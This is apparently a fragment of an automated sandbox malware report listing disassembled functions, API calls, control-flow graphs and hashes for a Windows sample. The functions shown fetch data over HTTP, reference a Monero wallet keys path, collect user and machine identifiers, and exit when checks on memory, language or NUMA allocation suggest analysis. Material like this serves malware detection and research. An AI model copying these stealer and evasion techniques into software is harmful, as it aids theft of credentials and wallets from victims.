                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: 0W$0X$0Y$0[$0\$HttpQueryInfoA$InternetSetOptionA$PW$PX$PY$pW$pX$pY$pZ$p\
                        • API String ID: 2238633743-1521126475
                        • Opcode ID: 9810b4b7c5ca3dc298414337d6f57f4d47fa04be263a9bc92bb84ae271b30ea5
                        • Instruction ID: 0467df6d4b94f0f1557239e37034b9d173a1f696461ea0ef21897554558e7860
                        • Opcode Fuzzy Hash: 9810b4b7c5ca3dc298414337d6f57f4d47fa04be263a9bc92bb84ae271b30ea5
                        • Instruction Fuzzy Hash: 016240B5B3A200AFC345DFA8EE889E637F9F74C311304C55AA605C32B5D6399D42EB12
                        Function 006D6280 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 6d6280-6d630b call 6ea7a0 call 6d47b0 call 6ea740 InternetOpenA StrCmpCA 1040 6d630d 1033->1040 1041 6d6314-6d6318 1033->1041 1040->1041 1042 6d631e-6d6342 InternetConnectA 1041->1042 1043 6d6509-6d6525 call 6ea7a0 call 6ea800 * 2 1041->1043 1045 6d64ff-6d6503 InternetCloseHandle 1042->1045 1046 6d6348-6d634c 1042->1046 1062 6d6528-6d652d 1043->1062 1045->1043 1048 6d634e-6d6358 1046->1048 1049 6d635a 1046->1049 1051 6d6364-6d6392 HttpOpenRequestA 1048->1051 1049->1051 1053 6d6398-6d639c 1051->1053 1054 6d64f5-6d64f9 InternetCloseHandle 1051->1054 1056 6d639e-6d63bf InternetSetOptionA 1053->1056 1057 6d63c5-6d6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1058 6d642c-6d644b call 6e8940 1057->1058 1059 6d6407-6d6427 call 6ea740 call 6ea800 * 2 1057->1059 1067 6d644d-6d6454 1058->1067 1068 6d64c9-6d64e9 call 6ea740 call 6ea800 * 2 1058->1068 1059->1062 1071 6d64c7-6d64ef InternetCloseHandle 1067->1071 1072 6d6456-6d6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 6d648b 1072->1076 1077 6d6482-6d6489 1072->1077 1076->1071 1077->1076 1080 6d648d-6d64c5 call 6ea9b0 call 6ea8a0 call 6ea800 1077->1080 1080->1072
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • InternetOpenA.WININET(006F0DFE,00000001,00000000,00000000,00000000), ref: 006D62E1
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6335
                        • HttpOpenRequestA.WININET(00000000,GET,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D6385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006D63BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D63D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006D63FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006D646D
                        • InternetCloseHandle.WININET(00000000), ref: 006D64EF
                        • InternetCloseHandle.WININET(00000000), ref: 006D64F9
                        • InternetCloseHandle.WININET(00000000), ref: 006D6503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET$H$
                        • API String ID: 3749127164-1196962364
                        • Opcode ID: 38a6ee49866e8ebb06ae5e8e4733ec8b7f2e25db44a88f68d6629ffaf9126673
                        • Instruction ID: a0f43177cc43435bb923130cc94320d38b01688412630d319b6fe6e3c895582d
                        • Opcode Fuzzy Hash: 38a6ee49866e8ebb06ae5e8e4733ec8b7f2e25db44a88f68d6629ffaf9126673
                        • Instruction Fuzzy Hash: 88715C71A11318ABDB24DBA0DC49BEE77BAAB44700F108199F10A6B2D4DBB46E85CF51
                        Function 006E5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 6e5510-6e5577 call 6e5ad0 call 6ea820 * 3 call 6ea740 * 4 1106 6e557c-6e5583 1090->1106 1107 6e55d7-6e564c call 6ea740 * 2 call 6d1590 call 6e52c0 call 6ea8a0 call 6ea800 call 6eaad0 StrCmpCA 1106->1107 1108 6e5585-6e55b6 call 6ea820 call 6ea7a0 call 6d1590 call 6e51f0 1106->1108 1133 6e5693-6e56a9 call 6eaad0 StrCmpCA 1107->1133 1138 6e564e-6e568e call 6ea7a0 call 6d1590 call 6e51f0 call 6ea8a0 call 6ea800 1107->1138 1124 6e55bb-6e55d2 call 6ea8a0 call 6ea800 1108->1124 1124->1133 1140 6e56af-6e56b6 1133->1140 1141 6e57dc-6e5844 call 6ea8a0 call 6ea820 * 2 call 6d1670 call 6ea800 * 4 call 6e6560 call 6d1550 1133->1141 1138->1133 1144 6e56bc-6e56c3 1140->1144 1145 6e57da-6e585f call 6eaad0 StrCmpCA 1140->1145 1270 6e5ac3-6e5ac6 1141->1270 1149 6e571e-6e5793 call 6ea740 * 2 call 6d1590 call 6e52c0 call 6ea8a0 call 6ea800 call 6eaad0 StrCmpCA 1144->1149 1150 6e56c5-6e5719 call 6ea820 call 6ea7a0 call 6d1590 call 6e51f0 call 6ea8a0 call 6ea800 1144->1150 1164 6e5865-6e586c 1145->1164 1165 6e5991-6e59f9 call 6ea8a0 call 6ea820 * 2 call 6d1670 call 6ea800 * 4 call 6e6560 call 6d1550 1145->1165 1149->1145 1250 6e5795-6e57d5 call 6ea7a0 call 6d1590 call 6e51f0 call 6ea8a0 call 6ea800 1149->1250 1150->1145 1171 6e598f-6e5a14 call 6eaad0 StrCmpCA 1164->1171 1172 6e5872-6e5879 1164->1172 1165->1270 1201 6e5a28-6e5a91 call 6ea8a0 call 6ea820 * 2 call 6d1670 call 6ea800 * 4 call 6e6560 call 6d1550 1171->1201 1202 6e5a16-6e5a21 Sleep 1171->1202 1180 6e587b-6e58ce call 6ea820 call 6ea7a0 call 6d1590 call 6e51f0 call 6ea8a0 call 6ea800 1172->1180 1181 6e58d3-6e5948 call 6ea740 * 2 call 6d1590 call 6e52c0 call 6ea8a0 call 6ea800 call 6eaad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 6e594a-6e598a call 6ea7a0 call 6d1590 call 6e51f0 call 6ea8a0 call 6ea800 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                        APIs
                          • Part of subcall function 006EA820: lstrlen.KERNEL32(006D4F05,?,?,006D4F05,006F0DDE), ref: 006EA82B
                          • Part of subcall function 006EA820: lstrcpy.KERNEL32(006F0DDE,00000000), ref: 006EA885
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5857
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006E51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5228
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5318
                          • Part of subcall function 006E52C0: lstrlen.KERNEL32(00000000), ref: 006E532F
                          • Part of subcall function 006E52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 006E5364
                          • Part of subcall function 006E52C0: lstrlen.KERNEL32(00000000), ref: 006E5383
                          • Part of subcall function 006E52C0: lstrlen.KERNEL32(00000000), ref: 006E53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 006E5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 8d13f69da156dd1cb38653629d87ec7afda1042e55521c25bd8a8cabc8cdd90f
                        • Instruction ID: 4959901e1f3c0cd2704ffa5c795b02552ecfd286569374478dc4726287ee4e23
                        • Opcode Fuzzy Hash: 8d13f69da156dd1cb38653629d87ec7afda1042e55521c25bd8a8cabc8cdd90f
                        • Instruction Fuzzy Hash: 98E13071912348AADB44FBE1DC929FE733BAF54300F51852CB50756191EF346E09CBA6
                        Function 006E17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 6e17a0-6e17cd call 6eaad0 StrCmpCA 1304 6e17cf-6e17d1 ExitProcess 1301->1304 1305 6e17d7-6e17f1 call 6eaad0 1301->1305 1309 6e17f4-6e17f8 1305->1309 1310 6e17fe-6e1811 1309->1310 1311 6e19c2-6e19cd call 6ea800 1309->1311 1313 6e199e-6e19bd 1310->1313 1314 6e1817-6e181a 1310->1314 1313->1309 1316 6e18cf-6e18e0 StrCmpCA 1314->1316 1317 6e198f-6e1999 call 6ea820 1314->1317 1318 6e18ad-6e18be StrCmpCA 1314->1318 1319 6e1849-6e1858 call 6ea820 1314->1319 1320 6e1821-6e1830 call 6ea820 1314->1320 1321 6e187f-6e1890 StrCmpCA 1314->1321 1322 6e185d-6e186e StrCmpCA 1314->1322 1323 6e1835-6e1844 call 6ea820 1314->1323 1324 6e1932-6e1943 StrCmpCA 1314->1324 1325 6e1913-6e1924 StrCmpCA 1314->1325 1326 6e1970-6e1981 StrCmpCA 1314->1326 1327 6e18f1-6e1902 StrCmpCA 1314->1327 1328 6e1951-6e1962 StrCmpCA 1314->1328 1348 6e18ec 1316->1348 1349 6e18e2-6e18e5 1316->1349 1317->1313 1346 6e18ca 1318->1346 1347 6e18c0-6e18c3 1318->1347 1319->1313 1320->1313 1344 6e189e-6e18a1 1321->1344 1345 6e1892-6e189c 1321->1345 1342 6e187a 1322->1342 1343 6e1870-6e1873 1322->1343 1323->1313 1331 6e194f 1324->1331 1332 6e1945-6e1948 1324->1332 1329 6e1926-6e1929 1325->1329 1330 6e1930 1325->1330 1336 6e198d 1326->1336 1337 6e1983-6e1986 1326->1337 1350 6e190e 1327->1350 1351 6e1904-6e1907 1327->1351 1333 6e196e 1328->1333 1334 6e1964-6e1967 1328->1334 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 6e18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 006E17C5
                        • ExitProcess.KERNEL32 ref: 006E17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 768af8970bd7cbafd58bb77bfc28d5d946e5ecc2edf45dbbf21df31c8eb341e8
                        • Instruction ID: 5cbed7f93ed65060496034ec937d234e04e47c496e687c7e8b45989cfac8e181
                        • Opcode Fuzzy Hash: 768af8970bd7cbafd58bb77bfc28d5d946e5ecc2edf45dbbf21df31c8eb341e8
                        • Instruction Fuzzy Hash: A7516DB4A16349EFDB04DFA2C964AFE77B6BF45704F108048E506AB341D770E942EB62
                        Function 006E7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 6e7500-6e754a GetWindowsDirectoryA 1357 6e754c 1356->1357 1358 6e7553-6e75c7 GetVolumeInformationA call 6e8d00 * 3 1356->1358 1357->1358 1365 6e75d8-6e75df 1358->1365 1366 6e75fc-6e7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6e75e1-6e75fa call 6e8d00 1365->1367 1368 6e7628-6e7658 wsprintfA call 6ea740 1366->1368 1369 6e7619-6e7626 call 6ea740 1366->1369 1367->1365 1377 6e767e-6e768e 1368->1377 1369->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006E7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E760A
                        • wsprintfA.USER32 ref: 006E7640
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$o
                        • API String ID: 1544550907-1328543574
                        • Opcode ID: a7bb7e362c05e7f085d5bbfa6ae504c20209d691e0874559991c57c4c77795ca
                        • Instruction ID: 7a539a80f74c2dd890a41658a74ac7eea17b5ab31d11858cfe44c9cdf2355083
                        • Opcode Fuzzy Hash: a7bb7e362c05e7f085d5bbfa6ae504c20209d691e0874559991c57c4c77795ca
                        • Instruction Fuzzy Hash: FA41A0B1E05388ABDF10DF95DC45BEEBBB9AF08704F104198F50967280DB78AE44CBA5
                        Function 006E69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42458), ref: 006E98A1
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42398), ref: 006E98BA
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42470), ref: 006E98D2
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E422A8), ref: 006E98EA
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42380), ref: 006E9903
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E48F48), ref: 006E991B
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E35D30), ref: 006E9933
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E35CF0), ref: 006E994C
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42218), ref: 006E9964
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42500), ref: 006E997C
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E422C0), ref: 006E9995
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E422D8), ref: 006E99AD
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E35B50), ref: 006E99C5
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 006E99DE
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006D11D0: ExitProcess.KERNEL32 ref: 006D1211
                          • Part of subcall function 006D1160: GetSystemInfo.KERNEL32(?), ref: 006D116A
                          • Part of subcall function 006D1160: ExitProcess.KERNEL32 ref: 006D117E
                          • Part of subcall function 006D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D112B
                          • Part of subcall function 006D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 006D1132
                          • Part of subcall function 006D1110: ExitProcess.KERNEL32 ref: 006D1143
                          • Part of subcall function 006D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006D123E
                          • Part of subcall function 006D1220: __aulldiv.LIBCMT ref: 006D1258
                          • Part of subcall function 006D1220: __aulldiv.LIBCMT ref: 006D1266
                          • Part of subcall function 006D1220: ExitProcess.KERNEL32 ref: 006D1294
                          • Part of subcall function 006E6770: GetUserDefaultLangID.KERNEL32 ref: 006E6774
                          • Part of subcall function 006D1190: ExitProcess.KERNEL32 ref: 006D11C6
                          • Part of subcall function 006E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006D11B7), ref: 006E7880
                          • Part of subcall function 006E7850: RtlAllocateHeap.NTDLL(00000000), ref: 006E7887
                          • Part of subcall function 006E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006E789F
                          • Part of subcall function 006E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7910
                          • Part of subcall function 006E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006E7917
                          • Part of subcall function 006E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006E792F
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006E6AF9
                        • Sleep.KERNEL32(00001770), ref: 006E6B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6B1A
                        • ExitProcess.KERNEL32 ref: 006E6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 66f944a522410fc0a57040b2276da9b5bfe338b5af008eda117e3714a177c14c
                        • Instruction ID: 4c06f4f0a94f195adb5e57fc66fd736ee15599269b73ad1c13d410a1a493acb5
                        • Opcode Fuzzy Hash: 66f944a522410fc0a57040b2276da9b5bfe338b5af008eda117e3714a177c14c
                        • Instruction Fuzzy Hash: 26316670D16348AADB44F7F1DC56BEE773BAF14340F01451DF102A6192EF706A05C6AA
                        Function 006D1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 6d1220-6d1247 call 6e89b0 GlobalMemoryStatusEx 1439 6d1249-6d1271 call 6eda00 * 2 1436->1439 1440 6d1273-6d127a 1436->1440 1442 6d1281-6d1285 1439->1442 1440->1442 1444 6d129a-6d129d 1442->1444 1445 6d1287 1442->1445 1447 6d1289-6d1290 1445->1447 1448 6d1292-6d1294 ExitProcess 1445->1448 1447->1444 1447->1448
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006D123E
                        • __aulldiv.LIBCMT ref: 006D1258
                        • __aulldiv.LIBCMT ref: 006D1266
                        • ExitProcess.KERNEL32 ref: 006D1294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
